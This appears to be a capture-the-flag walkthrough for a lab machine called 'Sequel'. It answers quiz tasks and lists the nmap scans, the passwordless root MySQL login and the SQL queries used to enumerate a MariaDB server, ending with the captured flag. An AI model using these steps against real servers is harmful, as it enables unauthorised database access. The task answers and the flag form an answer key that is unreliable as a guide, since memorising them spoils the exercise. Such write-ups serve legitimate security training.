Sequel

Target Information:

  • IP: 10.129.41.89
  • 5.5.5-10.3.27-MariaDB-0+deb10u1 Debian 10 running on port 3306

==========================================================

Task #1: What does the acronym SQL stand for?

  • A: Structured Query Language

Task #2: During our scan, which port running mysql do we find?

  • A: 3306
  • nmap -sV -T4 -v 10.129.41.89

Task #3: What community-developed MySQL version is the target running?

  • A: MariaDB
  • nmap 10.129.41.89 -sV -p 3306

Task #4: What switch do we need to use in order to specify a login username for the MySQL service?

  • A: -u
  • mysql -u username -h 10.129.41.89 -P 3306

Task #5: Which username allows us to log into MariaDB without providing a password?

  • A: root
  • sudo apt install mysql-client-core-8.0
  • mysql -u root -h 10.129.41.89 -P 3306

Task #6: What symbol can we use to specify within the query that we want to display everything inside a table?

  • A: *

Task #7: What symbol do we need to end each query with?

  • A: ;

Submit root flag: 7b4bec00d1a39e3dd4e021ec3d915da8

  • SHOW databases;
  • USE htb;
  • SHOW tables;
  • SELECT * FROM config;